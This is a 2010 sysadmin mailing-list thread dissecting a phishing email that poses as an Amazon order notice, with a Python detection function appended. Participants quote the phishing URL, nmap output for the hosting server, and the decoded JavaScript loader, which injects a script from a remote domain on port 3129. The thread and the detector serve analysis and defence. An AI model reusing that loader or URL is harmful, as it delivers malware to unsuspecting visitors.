I forgot my :-)
From: [email protected] [mailto:[email protected]] On Behalf Of James Rankin
Sent: Tuesday, February 23, 2010 12:20 PM
To: NT System Admin Issues
Subject: Re: Order Notify #401186

I was just alluding to the fact that my LinkedIn updates told me this morning that EZ had just done the CISSP exam. I am sure a lot of people on this list, CISSPs or not, can identify the intentions and tactics of the spammers and phishers from their attacks :-)

On 23 February 2010 17:17, Clark, Tommy R <[email protected]> wrote:

If he were fresh from a CISSP exam, he would have decoded the payload in walford.html as the following JavaScript.

function ljs(){try{var s=document.createElement("script");s.setAttribute("src","http://saeghiebeesiogoh.in:3129/js");document.body.appendChild(s)}catch(e){}}setTimeout ("ljs()",500);

Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/js to see what the true intentions were.

From: [email protected] [mailto:[email protected]] On Behalf Of James Rankin
Sent: Tuesday, February 23, 2010 11:45 AM
To: NT System Admin Issues
Subject: Re: Order Notify #401186

Now there's a guy who's obviously just fresh from a CISSP exam :-)

On 23 February 2010 16:36, Ziots, Edward <[email protected]> wrote:

http://80.109.240.71/~e.loesberg/walford.html <http://80.109.240.71/%7Ee.loesberg/walford.html> is the link inside the email. It's definitely a phishing attack.

Single box system behind a firewall (2 hops from source)

Name: members.chello.nl
Address: 80.109.240.71 (it's in Vienna, Austria)

PORT    STATE  SERVICE  REASON   VERSION
21/tcp  open   ftp      syn-ack  ProFTPD 1.2.10
80/tcp  open   http     syn-ack  Apache httpd

Like they say, never click the link. And don't answer the email, it lets them know you are there.. and they will just keep spamming you...

Z

From: Sherry Abercrombie [mailto:[email protected]]
Sent: Tuesday, February 23, 2010 10:37 AM
To: NT System Admin Issues
Subject: Re: Order Notify #401186

GMail is good. Marked this one as spam and sent to my spam folder, with a nice little warning that it might not be from who it says and to be careful, etc etc.

On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <[email protected]> wrote:

Oooohhh....I must click on the link, seeing as though it has some funky numbers instead of letters. Looks decidedly unsuspicious

On 23 February 2010 15:29, Carol Fee <[email protected]> wrote:

What the heck ??????

CFee

From: Customer Support [mailto:[email protected]]
Sent: Monday, February 22, 2010 6:55 PM
To: NT System Admin Issues
Subject: Order Notify #401186

Your Order id:822324764225
Info <http://80.109.240.71/%7Ee.loesberg/walford.html>
Thank you.
Amazon.com Support

--
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question."

--
Sherry Abercrombie
"Any sufficiently advanced technology is indistinguishable from magic." Arthur C. Clarke
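The decoded payload quoted in the thread creates a script element and points it at a second host on an unusual port. As an added example (not part of any message in the thread), the Python sketch below statically flags that pattern in decoded JavaScript without fetching anything; the function name, the regexes and the list of reasons are assumptions made for this illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# The payload quoted in the thread (decoded from walford.html), used as sample input.
THREAD_PAYLOAD = (
    'function ljs(){try{var s=document.createElement("script");'
    's.setAttribute("src","http://saeghiebeesiogoh.in:3129/js");'
    'document.body.appendChild(s)}catch(e){}}setTimeout("ljs()",500);'
)

# A variable that receives document.createElement("script").
CREATE_RE = re.compile(r'(\w+)\s*=\s*document\.createElement\(\s*["\']script["\']\s*\)', re.I)
# Either v.setAttribute("src", "URL") or v.src = "URL" on that variable.
SRC_RE = r'\b{var}\s*\.\s*(?:setAttribute\(\s*["\']src["\']\s*,\s*|src\s*=\s*)["\']([^"\']+)["\']'
EMPTY_CATCH_RE = re.compile(r'catch\s*\(\s*\w*\s*\)\s*\{\s*\}')
STRING_TIMER_RE = re.compile(r'set(?:Timeout|Interval)\s*\(\s*["\']')


def find_script_injections(js, page_host=""):
    """Return one finding per dynamically created <script> with a literal src."""
    findings = []
    for m in CREATE_RE.finditer(js):
        var = re.escape(m.group(1))
        for src in re.findall(SRC_RE.format(var=var), js):
            url = urlsplit(src)
            reasons = []
            if url.hostname and url.hostname != page_host:
                reasons.append("third-party host")
            if url.port not in (None, 80, 443):
                reasons.append("non-standard port")
            try:
                ipaddress.ip_address(url.hostname or "")
                reasons.append("raw IP host")
            except ValueError:
                pass  # hostname is a DNS name, not an IP literal
            if url.scheme == "http":
                reasons.append("cleartext http")
            if EMPTY_CATCH_RE.search(js):
                reasons.append("errors swallowed by empty catch")
            if STRING_TIMER_RE.search(js):
                reasons.append("string passed to timer (implicit eval)")
            findings.append({"src": src, "host": url.hostname,
                             "port": url.port, "reasons": reasons})
    return findings
```

Calling `find_script_injections(THREAD_PAYLOAD, page_host="80.109.240.71")` reports the remote script host, port 3129 and the reasons it stands out, which is enough to write a proxy or DNS block without requesting the URL.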
